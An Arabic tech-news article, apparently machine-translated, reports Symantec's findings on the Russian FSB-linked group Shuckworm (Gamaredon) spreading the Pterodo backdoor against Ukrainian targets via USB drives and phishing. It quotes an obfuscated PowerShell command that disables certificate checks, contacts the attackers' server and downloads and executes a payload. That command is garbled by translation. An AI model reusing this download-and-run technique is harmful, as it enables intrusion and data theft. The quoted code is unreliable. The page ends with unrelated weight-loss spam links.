Jannah Theme License is not validated, Go to the theme options page to validate the license, You need a single license for each domain name.
أخبار التقنية

قراصنة مدعومون من روسيا يطلقون برامج ضارة جديدة تعتمد على USB على الجيش الأوكراني


GettyImages

قال باحثون إن قراصنة يعملون لصالح جهاز الأمن الفيدرالي الروسي شنوا هجمات إلكترونية متعددة استخدمت برمجيات خبيثة تعتمد على USB لسرقة كميات كبيرة من البيانات من أهداف أوكرانية لاستخدامها في غزوها المستمر لجارتها الأصغر.

كتب باحثون من شركة Symantec ، المملوكة الآن لشركة Broadcom ، في منشور يوم الخميس: “قد تكون قطاعات وطبيعة المنظمات والآلات المستهدفة قد سمحت للمهاجمين بالوصول إلى كميات كبيرة من المعلومات الحساسة”. “كانت هناك مؤشرات في بعض المنظمات على أن المهاجمين كانوا على أجهزة أقسام الموارد البشرية بالمنظمات ، مما يشير إلى أن المعلومات حول الأفراد العاملين في المنظمات المختلفة كانت من أولويات المهاجمين ، من بين أمور أخرى”.

المجموعة ، التي تتبعها شركة Symantec باسم Shuckworm وباحثون آخرون تسمى Gamaredon و Armageddon ، نشطة منذ عام 2014 وتم ربطها بـ FSB الروسي ، جهاز الأمن الرئيسي في ذلك البلد. تركز المجموعة فقط على الحصول على معلومات استخبارية عن أهداف أوكرانية. في عام 2020 ، قال باحثون في شركة الأمن SentinelOne إن مجموعة القرصنة “هاجمت أكثر من 5000 كيان فردي في جميع أنحاء أوكرانيا ، مع التركيز بشكل خاص على المناطق التي تنتشر فيها القوات الأوكرانية”.

في فبراير ، بدأت Shuckworm في نشر البرامج الضارة الجديدة والبنية التحتية للقيادة والتحكم التي نجحت في اختراق دفاعات العديد من المنظمات الأوكرانية في الجيش ، والخدمات الأمنية ، والحكومة في ذلك البلد. يبدو أن أعضاء المجموعة مهتمون أكثر بالحصول على معلومات تتعلق بمعلومات عسكرية حساسة يمكن إساءة استخدامها في الغزو الروسي المستمر.

كشفت هذه الحملة الجديدة عن برامج ضارة جديدة في شكل نص برمجي PowerShell ينشر Pterodo ، وهو باب خلفي تم إنشاؤه بواسطة Shuckworm. يتم تنشيط البرنامج النصي عند توصيل محركات أقراص USB المصابة بأجهزة الكمبيوتر المستهدفة. يقوم البرنامج النصي الخبيث أولاً بنسخ نفسه على الجهاز المستهدف لإنشاء ملف اختصار بامتداد rtf.lnk. الملفات لها أسماء مثل video_porn.rtf.lnk و do_not_delete.rtf.lnk و Evidence.rtf.lnk. الأسماء ، التي تكون في الغالب باللغة الأوكرانية ، هي محاولة لإغراء الأهداف لفتح الملفات حتى يقوموا بتثبيت Pterodo على الأجهزة.

يستمر البرنامج النصي في تعداد جميع محركات الأقراص المتصلة بالكمبيوتر المستهدف ونسخ نفسه إلى جميع محركات الأقراص المرفقة القابلة للإزالة ، على الأرجح على أمل إصابة أي أجهزة غير متصلة بالإنترنت عن قصد في محاولة لمنعها من يتم اختراقها.

لتغطية مساراتها ، أنشأت Shuckworm العشرات من المتغيرات وأدارت بسرعة عناوين IP والبنية التحتية التي تستخدمها للقيادة والتحكم. تستخدم المجموعة أيضًا خدمات مشروعة مثل Telegram ومنصة التدوين المصغرة Telegraph للقيادة والسيطرة في محاولة أخرى لتجنب الكشف.

عادةً ما تستخدم Shuckworm رسائل البريد الإلكتروني المخادعة كناقل أولي في أجهزة كمبيوتر الأهداف. تحتوي رسائل البريد الإلكتروني على مرفقات ضارة تتنكر كملفات ذات امتدادات ، بما في ذلك docx و. rar و. sfx و lnk و hta. غالبًا ما تستخدم رسائل البريد الإلكتروني موضوعات مثل النزاعات المسلحة والإجراءات الجنائية ومكافحة الجريمة وحماية الأطفال كإغراءات للحصول على أهداف لفتح رسائل البريد الإلكتروني والنقر على المرفقات.

قال باحثو سيمانتيك إن الكمبيوتر المصاب الذي استعادوه في الحملة كان نموذجيًا لطريقة عمله. كتبوا:

في إحدى الضحايا ، كانت أول علامة على وجود نشاط ضار هي عندما بدا أن المستخدم يفتح ملف أرشيف RAR من المحتمل أنه تم تسليمه عبر بريد إلكتروني تصيد بالرمح والذي يحتوي على مستند ضار.

بعد فتح المستند ، لوحظ تنفيذ أمر PowerShell ضار لتنزيل حمولة المرحلة التالية من خادم القيادة والتحكم للمهاجمين:

“CSIDL_SYSTEM \ cmd.exe” / c start / min “” بوويرشيل -w مخفي
“$ gt =” / get. “+[char](56 + 56) +[char](104) +[char](112) $ hosta =[char](50 + 4
8) ؛[system.net.servicepointmanager]:: servercertificatevalidationcallb
ack = {$ true}؛ $ hosta + = ‘. vafikgo.’؛ $ hosta + =[char](57 + 57) $ hosta + =[char](
60 + 57) ؛ العناوين بالدولار =[system.net.dns]:: gethostbyname ($ hosta) ؛ $ addr = $ addrs.ad
قائمة الملابس[0]؛ $ client = (new-object
net.webclient)؛ $ faddr = “HTT” + ‘ps: //’ + $ addr + $ gt؛ $ text = $ client.downloads
tring ($ faddr)؛ iex $ text “

في الآونة الأخيرة ، لاحظت Symantec أن Shuckworm تستفيد من المزيد من عناوين IP في نصوص PowerShell النصية الخاصة بها. من المحتمل أن تكون هذه محاولة للتهرب من بعض طرق التتبع التي يستخدمها الباحثون.

تواصل Shuckworm أيضًا تحديث تقنيات التشويش المستخدمة في نصوص PowerShell النصية الخاصة بها في محاولة لتجنب الاكتشاف ، مع ملاحظة ما يصل إلى 25 نوعًا جديدًا من البرامج النصية للمجموعة شهريًا بين يناير وأبريل 2023.

يتضمن منشور الخميس عناوين IP ، والتجزئة ، وأسماء الملفات ، وغيرها من مؤشرات الاختراق التي يمكن للأشخاص استخدامها لاكتشاف ما إذا كان قد تم استهدافهم. يحذر المنشور أيضًا من أن المجموعة تشكل تهديدًا يجب أن تأخذ الأهداف على محمل الجد.

وكتبوا: “يوضح هذا النشاط أن تركيز Shuckworm الدؤوب على أوكرانيا مستمر”. “يبدو من الواضح أن الجماعات الهجومية الروسية المدعومة من الدولة القومية تواصل استهداف الأهداف الأوكرانية في محاولات للعثور على البيانات التي قد تساعد عملياتها العسكرية.”

مقالات ذات صلة

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *

زر الذهاب إلى الأعلى

What Are the Secrets Behind Billy Gardell’s Weight Loss in 2024? 5 Scientifically-Backed Ways to Lose Weight Best Appetite Suppressants for Hunger Control and Weight Loss in 2022 Top 5 Christina Aguilera Weight Loss Secrets: What Worked for Her Do Keto ACV Gummies Really Work? A Comprehensive Look Honest and Comprehensive Review of Biopure Keto Gummies Where to Buy Keto Gummies: Your Guide to the Best Products Your Guide to Walmart Keto ACV Gummies: Benefits, Reviews, and More! How Slim Plus Keto ACV Gummies Can Transform Your Weight Loss Journey Transform Your Body with Ripped Results Keto Gummies: The Tasty Way to Keto Success The Ultimate Guide to Total Fit Keto ACV Gummies for Weight Loss The Ultimate Guide to 1st Choice Keto + ACV Gummies The Ultimate Guide to Optimal Keto + ACV Gummies: Benefits and Usage Unraveling the Truth Behind ProFast Keto ACV Gummies: A Comprehensive Review Why You Need Keto and ACV Gummies: Discover Their Benefits Is the Keto + ACV Gummies Scam Real? Let’s Investigate! How Jonah Hill’s Weight Loss Journey Transformed in 2024 Why Anant Ambani’s Weight Loss Approach Worked: Detailed Insights and Methods How Jelly Roll’s 2024 Weight Loss Journey Transformed His Life Kelly Clarkson Weight Loss Secrets: How She Did It in 2024 Simple and Easy Tips from Melissa McCarthy’s Weight Loss Success Best Peptides for Weight Loss in 2024: Easy Choices, Proven Solutions, and Benefits How Lizzo’s Weight Loss Journey Evolved in 2024: Facts and Insights How Rebel Wilson Achieved Her Weight Loss Goals: Steps and Secrets Ultimate Facts About Weight Loss Drugs for Alzheimer’s: Latest 2024 Analysis Berberine Weight Loss: Latest Insights & Benefits for 2024 Why Semaglutide Dosage Matters for Effective Weight Loss: Tips and Insights Leanbean Review 2022: Ingredients, Effectiveness, and Side Effects